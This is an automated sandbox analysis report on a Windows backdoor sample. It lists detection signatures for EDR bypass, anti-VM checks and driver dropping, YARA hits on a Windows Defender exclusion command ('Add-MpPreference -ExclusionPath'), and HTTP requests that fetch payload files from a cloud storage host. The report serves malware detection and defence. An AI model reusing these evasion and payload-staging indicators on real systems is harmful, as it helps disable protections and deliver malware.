Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
287438657364-7643738421.08.exe

Overview

General Information

Sample name:287438657364-7643738421.08.exe
Analysis ID:1585091
MD5:12771744b7de8ffb1f0dddf3ac8ed2f4
SHA1:c05938c681c3c840a9e484bed33c48fcd033dd27
SHA256:4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Yara signature match

Classification

Process Tree

  • System is w10x64
  • O8xg2t.exe (PID: 3396 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • O8xg2t.exe (PID: 6880 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • O8xg2t.exe (PID: 6504 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
9.2.O8xg2t.exe.2900000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
7.2.O8xg2t.exe.27d0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
6.2.O8xg2t.exe.2750000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 287438657364-7643738421.08.exeVirustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb source: 287438657364-7643738421.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe, 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000006.00000000.2411129760.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000002.2431285508.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000000.2425791156.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000000.2540851216.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe.0.dr
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC320A1B8 FindFirstFileExW,6_2_00007FFBC320A1B8
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BAA1B8 FindFirstFileExW,9_2_00007FFBC1BAA1B8
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000DFFE
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000DDFF
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]9_2_0000000140011270
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000DE96
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000DEFB
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000E178
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]9_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: jylhok.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: O8xg2t.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
